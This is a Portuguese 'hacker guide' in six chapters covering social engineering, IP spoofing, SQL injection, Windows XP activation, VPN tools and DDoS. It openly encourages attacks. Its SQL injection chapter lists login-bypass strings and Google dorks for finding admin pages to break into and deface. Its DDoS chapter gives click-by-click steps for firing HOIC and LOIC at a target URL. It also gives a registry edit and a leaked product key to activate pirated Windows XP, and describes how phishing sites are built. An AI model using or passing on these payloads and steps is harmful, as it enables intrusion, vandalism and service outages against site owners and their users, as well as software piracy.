Você está na página 1de 33

Guia Hacker Black Eyes Brasil

-Capitulo 1 : Engenharia Social -Capitulo 2 : Spoofing -Capitulo 3: SQLi e Strings -Capitulo 4: Tornando o WIndows XP Original -Capitulo 5: Como se protejer -Capitulo 6: DDoS Autor: Andr C.O Crditos : Guia do Hacker Alex Fichler

Capitulo 1 ENGENHARIA SOCIAL


Padro O que engenharia social? Em Segurana da informao, chama-se Engenharia Social as prticas utilizadas para obter acesso a informaes importantes ou sigilosas em organizaes ou sistemas por meio da enganao ou explorao da confiana das pessoas. Para isso, o golpista pode se passar por outra pessoa, assumir outra personalidade, fingir que um profissional de determinada rea, etc. uma forma de entrar em organizaes que no necessita da fora bruta ou de erros em mquinas. Explora as falhas de segurana das prprias pessoas que, quando no treinados para esses ataques, podem ser facilmente manipuladas.

Entendendo a Engenharia Social

Engenharia social compreende a inaptido dos indivduos manterem-se atualizados com diversas questes pertinentes a tecnologia da informao, alm de no estarem conscientes do valor da informao que eles possuem e, portanto, no terem preocupao em proteger essa informao conscientemente. importante salientar que, a engenharia social aplicada em diversos setores da segurana da informao independente de sistemas computacionais, software e ou plataforma utilizada, o elemento mais vulnervel de qualquer sistema de segurana da informao o ser humano, o qual possui traos comportamentais e psicolgicos que o torna suscetvel a ataques de engenharia social. Dentre essas caractersticas, pode-se destacar:

Vaidade pessoal e/ou profissional: O ser humano costuma ser mais receptivo a avaliao positiva e favorvel aos seus objetivos, aceitando basicamente argumentos favorveis a sua avaliao pessoal ou profissional ligada diretamente ao benefcio prprio ou coletivo de forma demonstrativa.

Autoconfiana: O ser humano busca transmitir em dilogos individuais ou coletivos o ato de fazer algo bem, coletivamente ou individualmente, buscando transmitir segurana, conhecimento, saber e eficincia, buscando criar uma estrutura base para o incio de uma comunicao ou ao favorvel a uma organizao ou individuo.

Formao profissional: O ser humano busca valorizar sua formao e suas habilidades adquiridas nesta faculdade, buscando o controle em uma comunicao, execuo ou apresentao seja ela profissional ou pessoal buscando o reconhecimento pessoal inconscientemente em primeiro plano.

Vontade de ser til : O ser humano, comumente, procura agir com cortesia, bem como ajudar outros quando necessrio.

Busca por novas amizades : O ser humano costuma se agradar e sentir-se bem quando elogiado, ficando mais vulnervel e aberto a dar informaes.

Propagao de responsabilidade : Trata-se da situao na qual o ser humano considera que ele no o nico responsvel por um conjunto de atividades.

Persuaso : Compreende quase uma arte a capacidade de persuadir pessoas, onde se busca obter respostas especficas. Isto possvel porque as pessoas possuem caractersticas comportamentais que as tornam vulnerveis a manipulao.

A engenharia social no exclusivamente utilizada em informtica, a engenharia social uma ferramenta onde exploram-se falhas humanas em organizaes fsicas ou jurdicas onde operadores do sistema de segurana da informao possuem poder de deciso parcial ou total ao sistema de segurana da informao seja ele fsico ou virtual, porm devemos considerar que as informaes pessoais, no documentadas, conhecimentos, saber, no so informaes fsicas ou virtuais, elas fazem parte de um sistema em que possuem caractersticas comportamentais e psicolgicas na qual a engenharia social passa a ser auxiliada por outras tcnicas como: leitura fria, linguagem corporal, leitura quente, termos usados no auxlio da engenharia social para obter informaes que no so fsicas ou virtuais mas sim comportamentais e psicolgicas.

A engenharia social praticada em diversas profisses beneficamente ou no, visando proteger um sistema da segurana da informao ou atacar um sistema da segurana da informao.

Um engenheiro social no um profissional na engenharia social (a engenharia social no uma faculdade e sim tcnicas), mas trata-se de uma pessoa que possui conhecimentos em diversas reas profundamente ou no, 99% das pessoas que praticam a engenharia social, de forma benfica ou no, trabalham em grandes empresas ou em empresas de mdio porte, visando buscar falhas em um sistema de segurana da informao para aperfeioar ou explorar falhas.

Exemplos de empresas:

Agencias caa talentos: Estas empresas buscam pessoas com habilidades na engenharia social para usar de forma benfica dentro da empresa, visando aperfeioar a abordagem de pessoas com talentos por parte de seus funcionrios que sofrem ataques constantes de engenharia social para revelarem talentos descobertos pela empresa.

Seguradoras, Planos de Sade: Estas empresas buscam constantemente na internet e outros meios de busca de pessoas com talentos em engenharia social, visando reduzir ataques individuais ou coletivos visando proteger o quadro de clientes, visando evitar a migrao de clientes para outras empresas da mesma atividade.

A engenharia social muito confundida com a arte da enganao em termos tcnicos por estar relacionada em casos de violao da segurana da informao virtualmente e fsicamente, porm devemos lembrar que a engenharia social

utilizada para a proteo da informao tambm, estes casos so freqentes e no so divulgados por motivos de segurana da informao de uma pessoa juridica ou pessoa fsica, uma falha descoberta por uma pessoa com habilidades na engenharia social ela pode ser explorada de duas formas, beneficamente ou maleficamente, sua atuao como pessoa com habilidades na engenharia social contratado para solucionar falhas e no amplia-las, est a forma benfica de usar a engenharia social, a forma malfica de utilizar a engenharia social est ligada a 99% dos casos por pessoas que buscam violar, obter a informao de forma desonesta, buscando lucros pessoas ou empresariais, lembramos que a engenharia social no uma faculdade e sim uma habilidade pessoal de um profissional ou no em uma determinada rea, profisso, dedicao, hobby, entre outros.

A engenharia social utilizada no dia-a-dia de pessoas comuns ou no de forma involuntria, o que difere o uso involuntrio da engenharia social do prejulgamento ou deduo a vaidade pessoal ligada ao objetivo pessoal que induz a engelharia social involuntria, freqentes em lugares comuns como:

Exemplos de locais:

Feiras livres: A engenharia social involuntria freqente nas feiras livres em desconfiamos da qualidade, da validade, do preo, usamos a engelharia social involuntria para obtermos informaes que nos favorea diretamente, esta forma de praticar a engenharia social involuntria avaliada como trao comportamental.

Bares: A engenharia social involuntria freqente em bares, buscando informaes que possam nos favorecer, em sua grande maioria esta pratica est

ligada conquista, romantismo, de uma forma geral visando a conquista afetiva ou amorosa de uma segunda pessoa seja organizadamente ou no.

A engenharia social lida com varias formas e tcnicas em situaes diversas, pessoas com habilidades na engenharia social que atuam nesta rea por muitos anos definem a engenharia social como umas das ferramentas mais utilizadas no mundo em comunicao humana, visando proteger a informao ou no, divulgar a informao ou no, uma arma ou uma flor em suas mos com uma imagem desfocada ou focada, porm muito perigosa ao corao. Tcnicas

A maioria das tcnicas de engenharia social consiste em obter informaes privilegiadas enganando os usurios de um determinado sistema atravs de identificaes falsas, aquisio de carisma e confiana da vtima. Um ataque de engenharia social pode se dar atravs de qualquer meio de comunicao. Tendose destaque para telefonemas, conversas diretas com a vtima, e-mail e WWW. Algumas dessas tcnicas so:

Vrus que se espalham por e-mail

Criadores de vrus geralmente usam e-mail para a propagar de suas criaes. Na maioria dos casos, necessrio que o usurio ao receber o e-mail execute o arquivo em anexo para que seu computador seja contaminado. O criador do vrus pensa ento em uma maneira de fazer com que o usurio clique no anexo. Um dos mtodos mais usados colocar um texto que desperte a curiosidade do usurio. O texto pode tratar de sexo, de amor, de notcias atuais ou at mesmo de um assunto particular do internauta. Um dos exemplos mais clssicos o vrus I Love You, que chegava ao e-mail das pessoas usando este mesmo nome. Ao

receber a mensagem, muitos pensavam que tinham um(a) admirador(a) secreto(a) e na expectativa de descobrir quem era, clicavam no anexo e contaminam o computador. Repare que neste caso, o autor explorou um assunto que mexe com qualquer pessoa. Alguns vrus possuem a caracterstica de se espalhar muito facilmente e por isso recebem o nome de worms (vermes). Aqui, a engenharia social tambm pode ser aplicada. Imagine, por exemplo, que um worm se espalha por e-mail usando como tema cartes virtuais de amizade. O internauta que acreditar na mensagem vai contaminar seu computador e o worm, para se propagar, envia cpias da mesma mensagem para a lista de contatos da vtima e coloca o endereo de e-mail dela como remetente. Quando algum da lista receber a mensagem, vai pensar que foi um conhecido que enviou aquele email e como o assunto amizade, pode acreditar que est mesmo recebendo um carto virtual de seu amigo. A ttica de engenharia social para este caso, explora um assunto cabvel a qualquer pessoa: a amizade.

E-mails falsos (spam)

Este um dos tipos de ataque de engenharia social mais comuns e usado principalmente para obter informaes financeiras da pessoa, como nmero de conta-corrente e senha. Neste caso, o aspecto explorado a confiana. Boa parte dos criadores desses e-mails so criminosos que desejam roubar o dinheiro presente em contas bancrias. Porm, os sistemas dos bancos so muito bem protegidos e quase que inviolveis! Como invivel tentar burlar a seguranas dos sistemas bancrios, mais fcil ao criminoso tentar enganar as pessoas para que elas forneam suas informaes bancrias. A ttica usada a seguinte: o criminoso adquire uma lista de e-mails usados para SPAM que contm milhes de endereos, depois vai a um site de um banco muito conhecido, copia o layout da pgina e o salva em um site provisrio, que tem a url semelhante ao site do banco. Por exemplo, imagine que o nome do banco seja 'Banco Dinheiro' e o site seja [Somente usurios registrados podem ver os Links. Clique aqui para se REGISTRAR]. O criminoso cria um site semelhante: 'www.bancodinhero.com' ou

'www.bancodinheiro.com.br' ou 'www.bancodinheiro.org', enfim. Neste site, ele faz uma cpia idntica a do banco e disponibiliza campos especficos para o usurio digitar seus dados confidenciais. O passo seguinte enviar um e-mail lista adquirida usando um layout semelhante ao do site. Esse e-mail acompanhado por um link que leva ao site falso. Para fazer com que o internauta clique no link, o texto da mensagem pode, por exemplo, sugerir uma premiao: "Voc acaba de ser premiado com 10 mil reais. Clique no link para atualizar seu cadastro e receber o prmio". Como a instituio bancria escolhida geralmente muito conhecida, as chances de que o internauta que recebeu o e-mail seja cliente do banco so grandes. Assim, ele pode pensar que de fato foi o banco que enviou aquela mensagem, afinal, o e-mail e o site do link tem o layout da instituio. Como conseqncia, a vtima ingenuamente digita seus dados e dias depois percebe que todo o dinheiro da sua conta sumiu! Repare que em casos assim, o golpista usa a imagem de confiabilidade que o banco tem para enganar as pessoas. Mensagens falsas que dizem que o internauta recebeu um carto virtual ou ganhou um prmio de uma empresa grande so comuns. Independente do assunto tratado em e-mails desse tipo, todos tentam convencer o internauta a clicar em um link ou no anexo. A forma utilizada para convencer o usurio a fazer isso uma ttica de engenharia social.

Crditos Guia do Hacker

Engenharia Social, crditos Guia do Hacker

Lightbulb [Dica] Como Encantar Pessoas CONHEA A NATUREZA HUMANA Essencialmente o ser humano egosta. As pessoas esto mais interessadas nelas mesmas. Voc

est mais interessado em voc mesmo que em qualquer outra pessoa no mundo. Reconhecendo este egosmo natural do ser humano, voc poder melhor se relacionar com as pessoas.

ELOGIE Todos gostamos de ouvir uma palavra gentil. Para conquistar algum basta dizer coisas agradveis. O elogio deve ser sincero, natural. Elogie o ato e no a pessoa. Evitar favoritismo e constrangimentos. Diga algo assim: " Arthur, seu trabalho ficou timo."( no diga: " Arthur, voc timo profissional."). Habitue-se a elogiar e sentir como voc e as pessoas se sentiro melhor. No exagere nos elogios.

FAA AS PESSOAS SE SENTIREM IMPORTANTES Todos vivemos para sermos reconhecidos. D uma forma ou de outra desejamos ser importantes. Para conquistar algum faa-a se sentir importante. Siga estas dicas: Fale o nome da pessoa. Nosso nome soa como msica aos nossos ouvidos. Oua com ateno. Repare: quando algum ouve voc com ateno, voc se sente importante.

Antes de responder, aguarde uns segundos. Faa uma pausa. Dar a impresso de que voc pensou e que valeu a pena refletir. Leve em considerao a todos. Evite falar mais com o lder ou algum considerado importante. Evite favoritismo.

OUA COM ATENO Quanto mais voc ouvir algum, mais se tornar interessante para ela. Um bom ouvinte permite ao outro escutar a pessoa mais importante do mundo: ela mesma. Dicas para encantar: Olhe com ateno para quem est falando. Evite ouvir olhando para outras pessoas, coisas ou lugares " interessantes". Algumas pessoas mostram o quanto so "antipticas" com seus olhares evasivos. No deixe ningum ou qualquer barulho interferir. Envolva-se no assunto por completo. Se algum estiver atrapalhando diga: " Por favor, deixe-me ouvir o Pedro..." Todos apreciaro seu cuidado com pessoas. No fique ansioso para falar sobre outra coisa. Mantenha a calma. Quem fala muito pode ser considerado " tagarela" e egosta por querer ser sempre o centro das atenes.

Desenvolva a conversa, faa novas perguntas. Isto demonstrar que voc d importncia a quem perguntou.

CONCORDE COM AS PESSOAS Desenvolva uma personalidade tolerante. Ningum gosta de ser contrariado. Pessoas adoram aqueles que concordam com elas. Mesmo que no concorde com uma pessoa, procure extrair da fala dela algo que seja comum, verdadeiro, para voc e ela. Evidencie que concorda com ela. Movimente a cabea ou fale claramente: "Concordo com voc." Evite discordar abertamente, salvo excees. Discordando, de preferncia no diga nada. Freqentemente no vale a pena discordar.

EVITE POLMICAS, DISCUSSES. Apresente seu assunto sem que as pessoas levantem objees contra voc. Claro, por mais que tente ser neutro vai sempre encontrar algum que discorde de voc. Discordar da sua

neutralidade. Em vez de dar sua opinio, exponha a de autoridades no assunto, mesmo que voc seja a autoridade mxima. Se as pessoas no concordarem com a opinio, no ser a sua mas a de outra pessoa. No se trata de no ter opinio, mas de evitar discusses desnecessrias. Quem discute perde pontos. Seja diplomata!

DESCUBRA PELO QUE O OUTRO SE FASCINA, QUER OU DESEJA E MOSTRE A ELE COMO CONSEGUIR. Sabendo o que os outros querem ficar mais fcil envolv-los, persuadi-los e encant-los, falando a eles o que desejam ouvir. Fale a mesma lngua dos outros. Fale sobre o que as pessoas querem ouvir. Foque nelas, no em voc. Por exemplo: se uma pessoa ou um grupo deseja vender mais, mostre COMO podem conseguir o que desejam. D sugestes. Torne-se o heri delas. Para descobrir o que as pessoas querem observe-as, faa perguntas, oua. CAUSE BOA IMPRESSO. De forma geral, ns controlamos as opinies dos outros sobre ns mesmos. As pessoas opinam a nosso respeito de acordo como nos portamos. Tendemos a responder conforme o comportamento

da outra pessoa. Se voc quer encantar pessoas deve primeiro passar uma boa impresso. Dicas: Seja simptico. Sorria sempre. Quem deseja sucesso pessoal deve sorrir para a vida. Antes de dizer qualquer coisa, d um sorriso sincero! A pessoa devolver um outro sorriso e ser mais receptiva. Mostre entusiasmo. Ningum gosta de pessoas desanimadas, de mal com a vida. Sorrir e evidenciar entusiasmo so comportamentos que devem ser treinados como qualquer outro. Servem para voc construir uma atmosfera positiva, envolvente. Voc encantar qualquer pessoa sorrindo e sendo entusiasmado. No queira ser maior que os outros. No tente ser o melhor fazendo com que os outros sejam os piores. Quem quer "subir na vida", "pisando nos outros", cedo ou tarde perde a batalha. No fique se exibindo, mostrando que s voc, quase sempre voc, o melhor para fazer isto ou aquilo. Evite ser arrogante. O tom da voz importante no encantamento. Treine uma voz amigvel.

SAIBA AGRADECER.

Demonstre sempre sua gratido. Treine a "arte de dizer obrigado". No sussurre ou engula palavras. Fale com vontade : "obrigado!" Olhe para a pessoa. Sorria. Diga o nome dela. Faz muita diferena falar simplesmente " obrigado", em vez de "obrigado, Paulo!" Lembre: nosso nome soa como msica aos nossos ouvidos.

Capitulo 2 SPOOFING
Base de spoofing

O contexto de redes de computadores, IP spoofing um ataque que consiste em mascarar (spoof) pacotes IP utilizando endereos de remetentes falsificados. Devido s caractersticas do protocolo IP, o reencaminhamento de pacotes feito com base numa premissa muito simples: o pacote dever ir para o destinatrio (endereo-destino) e no h verificao do remetente no h validao do endereo IP nem relao deste com o router anterior (que encaminhou o pacote). Assim, torna-se trivial falsificar o endereo de origem atravs de uma manipulao simples do cabealho IP. Assim,vrios computadores podem enviar pacotes fazendo-se passar por um determinado endereo de origem, o que representa uma sria ameaa para os sistemas baseados em autenticao pelo endereo IP.

Falsificao de um pacote: A cada pacote enviado estar geralmente associada uma resposta (do protocolo da camada superior) e essa ser enviada para a

vtima, pelo o atacante no pode ter conhecimento do resultado exato das suas aes apenas uma previso. Esta tcnica, utilizada com outras de mais alto nvel, aproveita-se, sobretudo, da noo de confiabilidade que existe dentro das organizaes: supostamente no se deveria temer uma mquina de dentro da empresa, se ela da empresa. Por outro lado, um utilizador torna-se tambm confivel quando se sabe de antemo que estabeleceu uma ligao com determinado servio. Esse utilizador torna-se interessante, do ponto de vista do atacante, se ele possuir (e estiver usando) direitos privilegiados no momento do ataque. Bom, mas resta a interaco com as aplicaes, alm de que as caractersticas do protocolo IP permitem falsificar um remetente, mas no lhe permitem receber as respostas essas iro para o endereo falsificado. Assim, o ataque pode ser considerado cego. Essa tcnica conhecida por desvio de sesso TCP, ou TCP session hijacking em ingls. Existem mtodos para evitar estes ataques, como a aplicao de filtros de pacotes, filtro ingress nos gateways; faz sentido bloquear pacotes provindos da rede externa com endereos da rede local. Idealmente, embora muito negligenciado, usar um filtro egress que iria descartar pacotes provindos da rede interna com endereo de origem no-local que fossem destinados rede externa pode prevenir que utilizadores de uma rede local iniciem ataques de IP contra mquinas externas. Existem outros ataques que utilizam esta tcnica para o atacante esconder a origem ou para potencializar um determinado ataque: ataques SYN (SYN flooding) ou ataques smurf so exemplos muito citados. A maior vantagem do Ip spoofing em relao a outros tipos de farejamento de conexes (como o DNS spoofing, por exemplo) que ele funciona em nvel de conexo, permitindo farejar e interceptar conexes e pacotes em redes de todos os sitemas, seja ele Linux, Unix, Windows, Solaris ou qualquer outro existente, desde que a conexo parta de um IP confivel com um endereo mac conhecido.

Capitulo 3 SQLi e STRINGS


INVADINDO SITES VULNERAVEIS! (BOM PARA DEFACEMENT)

SQL INJECTION, denominado como um exploit , que buscam erros de alguns sites, inprudencia de algun mals programadores Vou deixar abaixo os Strings que sao codigos que voce deixa no login e senha de usuario tendo assim acesso ao site!

admin ' - ' ou 0=0 -"ou 0=0 -ou 0=0 -' ou 0=0 # "ou 0=0 # ou 0=0 # ' ou ' x'='x "ou" x"="x ') ou (' x'='x ' ou 1=1 --

"ou 1=1 -ou 1=1 -' ou a=a -"ou" a"="a ') ou (' a'='a ") ou ("a"="a hi "ou" a"="a hi "ou 1=1 -hi ' ou 1=1 -hi ' ou ' a'='a hi ') ou (' a'='a hi") ou ("a"="a b' or ' 1=' ' or '1 ' or '| ' or 'a'='a ' or ''=' ' or 1=1-') or ('a'='a ' or '1'='1

Bom, ai esta os codigos, agora vem o proximo passo:

Achar sites faceis de invadir pode procurar pelo google por sites com login e senha digita algo do tipo abaixo que o google procura os sites com login e senha administrativo liberado da voc conseguira invadir usando as strings mostradas anteriormente:

allinurl:admin/index.asp allinurl:admin/default.asp allinurl:admin/admin.asp allinurl:admin/login.asp allinurl:/admin/entrar.asp allinurl:/admin/default.asp allinurl:/admin/index.asp allinurl:/admin/login.asp allinurl:/admin/password.asp allinurl:/admin/senha.asp

pode tambem usar o comando inurl:mais o que quer achar. s para resumir: voces pegam esses codigos ai acima e bota no login e senha de sites inseguros, feito isso o codigo ira buscar as falhas dos sites e logar com o primeiro usuario que encontrar. bom proveito.

Strings: Uma lista mais completa de strngs.

allinurl:admin/index.asp allinurl:admin/default.asp allinurl:admin/admin.asp allinurl:admin/login.asp allinurl:/admin/entrar.asp allinurl:/admin/default.asp allinurl:/admin/index.asp allinurl:/admin/login.asp allinurl:/admin/password.asp allinurl:/admin/senha.asp allinurl:/login/login.asp allinurl:/adm/login.asp allinurl:/adm/index.asp allinurl:/adm/default.asp allinurl:/login/index.asp allinurl:/login/default.asp allinurl:/webmaster/login.asp allinurl:/webadmin/default.asp

allinurl:/webadmin/index.asp allinurl:/webadmin/default.asp allinurl:/menu_admin/default.asp allinurl:/menu_admin/index.asp allinurl:/menu_admin/login.asp allinurl:/noticias/admin/ allinurl:/news/admin/ allinurl:/cadastro/admin/ allinurl:/portal/admin/ allinurl:/site/admin/ allinurl:/home/admin.asp allinurl:/home/admin/index.asp allinurl:/home/admin/default.asp allinurl:/home/admin/login.asp allinurl:/web/admin/index.asp allinurl:/web/admin/default.asp allinurl:/web/admin/login.asp allinurl:/home/adm/login.asp allinurl:/home/adm/senha.asp allinurl:/home/adm/index.asp allinurl:/home/adm/defaul.asp allinurl:/menu/admin/index.asp

allinurl:/menu/admin/default.asp allinurl:/menu/admin/login.asp allinurl:/menu/admin/admin.asp allinurl:/painel/admin/admin.asp allinurl:/painel/admin/login.asp allinurl:/painel/admin/index.asp allinurl:/painel/admin/default.asp allinurl:/site/admin/default.asp allinurl:/site/admin/index.asp allinurl:/site/admin/login.asp allinurl:/asp/admin/login.asp allinurl:/asp/admin/index.asp allinurl:/asp/admin/default.asp allinurl:/shop/admin/default.asp allinurl:/shop/admin/index.asp allinurl:/shop/admin/login.asp allinurl:/ecommerce/admin/index.asp allinurl:/ecommerce/admin/default.asp allinurl:/ecommerce/admin/login.asp allinurl:/pedidos/admin/default.asp allinurl:/pedidos/admin/index.asp allinurl:/pedidos/admin/login.asp

allinurl:/compras/admin/ allinurl:/clientes/admin/ allinurl:/busines/admin/ allinurl:/area_restrita/admin.asp allinurl:/area_restrita/login.asp allinurl:/area_restrita/index.asp allinurl:/acesso/admin.asp allinurl:/acesso/admin/default.asp allinurl:/acesso/admin/index.asp allinurl:/post/admin/default.asp allinurl:/post/admin/ allinurl:/post/admin/index.asp allinurl:/post/admin/login.asp allinurl:/eshop/admin/ allinurl:/eshop/admin.asp allinurl:/eshop/admin/default.asp allinurl:/eshop/admin/index.asp allinurl:/comercio/admin.asp allinurl:/comercio/admin/default.asp allinurl:/comercio/admin/index.asp allinurl:/news/admin/login.asp allinurl:/news/admin/default.asp

allinurl:/news/admin/index.asp allinurl:/imprensa/login.asp allinurl:/imprensa/admin.asp allinurl:/imprensa/admin/default.asp allinurl:/imprensa/admin/index.asp allinurl:/imprensa/admin/login.asp allinurl:/banners/admin.asp allinurl:/banners/admin/default.asp allinurl:/banners/admin/index.asp allinurl:/banners/admin/login.asp allinurl: allinurl:/banner/admin/ allinurl:/banner/admin/default.asp allinurl:/banner/admin/index.asp allinurl:/newsleter/admin.asp allinurl:/newsleter/admin/default.asp allinurl:/newsleter/admin/index.asp allinurl:/principal/admin.asp allinurl:/principal/admin/default.asp allinurl:/principal/admin/index.asp allinurl:/principal/admin/login.asp allinurl:/editar/admin.asp allinurl:/editar/admin/login.asp

allinurl:/editar/admin/index.asp allinurl:/editar/admin/default.asp allinurl:/form/admin.asp allinurl:/admin/admin.asp allinurl:/admin/index.asp allinurl:/admin/admin/default.asp allinurl:/edit/admin/index.asp allinurl:/edit/admin/default.asp allinurl:/menu/admin/senha.asp allinurl:/painel/admin/senha.asp allinurl:/menu_admin/senha.asp allinurl:/pedidos/admin/senha.asp allinurl:/vendas/admin/senha.asp allinurl:/principal/admin/senha.asp allinurl:/home/admin/senha.asp allinurl:/news/admin/senha.asp allinurl:/noticias/admin/senha.asp allinurl:/portal/admin/senha.asp allinurl:/site/admin/senha.asp allinurl:/admin/admin/adm.asp allinurl:/admin/adm/senha.asp allinurl:/adm/admin/login.asp

allinurl:/adm/admin/index.asp allinurl:/adm/admin/default.asp allinurl:/admin/loja/senha.asp allinurl:/admin/lojas/default.asp allinurl:/admin/lojas/index.asp allinurl:/loja/admin.asp allinurl:/db/admin/index.asp allinurl:/db/admin/login.asp allinurl:/db/admin/default.asp allinurl:/db/admin/senha.asp allinurl:/host/admin/default.asp allinurl:/host/admin/index.asp allinurl:/host/admin/login.asp allinurl:/login/admin.asp allinurl:/login_admin/index.asp allinurl:/login_admin/default.asp allinurl:/login_admin/login.asp allinurl:/store/admin.asp allinurl:/store/admin/default.asp allinurl:/store/admin/index.asp allinurl:/stroe/admin/login.asp allinurl:/images/admin/

allinurl:/client/admin.asp allinurl:/order/admmin.asp allinurl:/order/admin/index.asp allinurl:/order/admin/login.asp allinurl:/order/admin/default.asp allinurl:/admin/senha.asp allinurl:/strore/admin/senha.asp allinurl:/controle/admin.asp allinurl:/controle/admin/index.asp allinurl:/controle/admin/default.asp allinurl:/controle/admin/login.asp allinurl:/parceiros/admin.asp allinurl:/parceiros/admin/login.asp allinurl:/parceiros/admin/default.asp allinurl:/parceiros/admin/index.asp allinurl:/administrador/login.asp allinurl:/webmaster/login.asp allinurl:/webmaster/senha.asp allinurl:/webmaster/autenticar.asp allinurl:/admin/autenticar.asp allinurl:/admin/logout.asp allinurl:/admin/logar.asp

allinurl:/webmaster/logar.asp allinurl:/store/admin/logar.asp allinurl:/shopping/admin.asp allinurl:/shopping/admin/login.asp allinurl:/shopping/admin/index.asp allinurl:/shopping/admin/default.asp allinurl:/admin/menu.asp allinurl:/admin/painel.asp allinurl:/shop/admin/logar.asp allinurl:/admin/acesso.asp allinurl:/restrito/admin.asp allinurl:/restrito/acesso/admin.asp allinurl:/restrito/adm/login.asp allinurl:/webmaster/entrar.asp allinurl:/admin/site/entrar.asp allinurl:/ecommerce/admin/index.asp allinurl:/ecommerce/admin/default.asp allinurl:/ecommerce/admi

Capitulo 4 TORNANDO O WINDOWS XP ORIGINAL

Tornando O Windows Xp Original - 100% Aprovado ________________________________________ Pra quem est com Windows XP pirata, seguindo esses passos voc valida seu windowns XP.Sempre uso depois que formato meu PC.

1. V em Iniciar > Executar

2. Digite regedit e clique em OK.

3. J dentro do regedit, navegue at a chave: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndowsNT\CurrentVersion\WPAEvents

4. No painel direita, clique duas vezes em OOBETimer

5. Na janela que foi aberta, apague qualquer valor e clique em OK. Feche o regedit

6. V novamente em Iniciar > Executar e dessa vez digite: %systemroot%\system32\oobe\msoobe.exe /a

7. Na janela que foi aberta, escolha a opo Sim, desejo telefonar...

8. Na prxima etapa, clique no boto Alterar chave de produto.

9. Na etapa seguinte, digite a CD-Key: THMPV-77D6F-94376-8HGKG-VRDRQ e clique no boto Atualizar

10. Aps clicar no boto Atualizar, o assistente para ativao voltar para a janela anterior, ento, clique em Lembrar mais tarde e reinicie o Windows.

11. Reiniciado o Windows v novamente em Iniciar > Executar e digite: %systemroot%\system32\oobe\msoobe.exe /a

12. Aparecer a seguinte mensagem:

Ativao do Windows O Windows j est ativado. Clique em OK para sair.

Capitulo 5 COMO SE PROTEJER


Como se proteger: Hotspot Shield - http://goo.gl/G83kR

Pensando na segurana dos usurios, a AnchorFree desenvolveu o Hotspot Shield, um programa que capaz de proporcionar maior segurana em casa, no trabalho e em locais pblicos. Compatvel com conexes via cabo ou wireless, o software atua por meio de uma proteo que bloqueia conexes indevidas.

ProXPN - http://goo.gl/jRFK0

Como funciona? Ao contrrio do que podemos pensar, utilizar o proXPN extremamente fcil. N ajanela principal do programa, basta digitar seu nome e senha para conectar-se. Quando a luz verde estiver acesa, voc j pode navegar livremente e com o mximo de segurana pela internet. Por padro, o programa se conecta automaticamente sempre que a mquina for inicializada.

SumRando - http://goo.gl/4f13W

Para utilizar necessrio criar conta registre-se no link abaixo https://www.sumrando.com/Account/register.aspx

SecurityKISS - http://goo.gl/WFQ0J

Fcil de usar Sem registro, sem nomes de usurio

Faa o download, instale, conecte - e voc est assegurado Lista de servidores tempo para selecionar a partir de OpenVPN, PPTP e L2TP Todas as plataformas suportadas

Capitulo 6 DDoS
DDoS - Ataque de negao de Servio DDoS: O ataque distribudo por negao de servio (DDoS, do ingls Distributed Denialof-Service attack) atinge sua meta excedendo os limites do servidor. Para tal faanha, os responsveis pelo ataque criam programas maliciosos que so instalados em diversas mquinas, as quais realizaro mltiplos acessos simultneos ao site em questo.

Principais Ferramentas

LOIC: LOIC um programa de computador de cdigo aberto escrito em C# que tem como objetivo executar um ataque de negao de servio (tambm conhecido como DoS, do ingls "Denial of Service"). O programa foi desenvolvido pela Praetox Technologies em 2006 com o intuito de avaliar e testar redes, sendo depois disponibilizado para domnio pblico.

HOIC: O HOIC uma verso aprimorada e mais fcil de usar do LOIC (Low Orbit Ion Cannon), aplicativo usado anteriormente pelos membros do grupo. A grande diferena entre eles que se antes era necessrio um entendimento bsico de linguagem de programao para ajudar a derrubar um site, agora, basta que voc consiga clicar um mouse e digitar um endereo da web em um teclado para fazer isso.

DDoS/HOIC HOIC

1 Baixe o HOIC http://www.4shared.com/rar/E-b35Ruq/HOIC.html 2Extraia de no local de preferencia 3 Clique no HOIC - STOP THE WORLD 4 Em TARGETS clique NO + (Mais) 5 no campo URL cole com alvo EX:http://sitealvo.com.br/ 6 No campo Power selecione (High) 7 No campo Booster selecione STOP THE WORLD.hoic (unica opo) SE PREFIR BAIXE UM BOOSTER MAIS FORTE 8 Clique em Add 9 Clique em FIRE TEH LAZER !

10 Pronto j estara atacando !! Obs:Para selecionar mais de um alvos faa a mesma operao.

DDoS/LOIC Loic

1 Baixe o LOIC http://goo.gl/iXVJW 2 Abra 3 No campo 1 - Selecione o Alvo Copie o Link cole no campo URL 4 Clique em Testar 5 Aps o IP Aparecer no campo (Alvo Selecionado) 6 Clique em (AtacaaaaR !!)

Você também pode gostar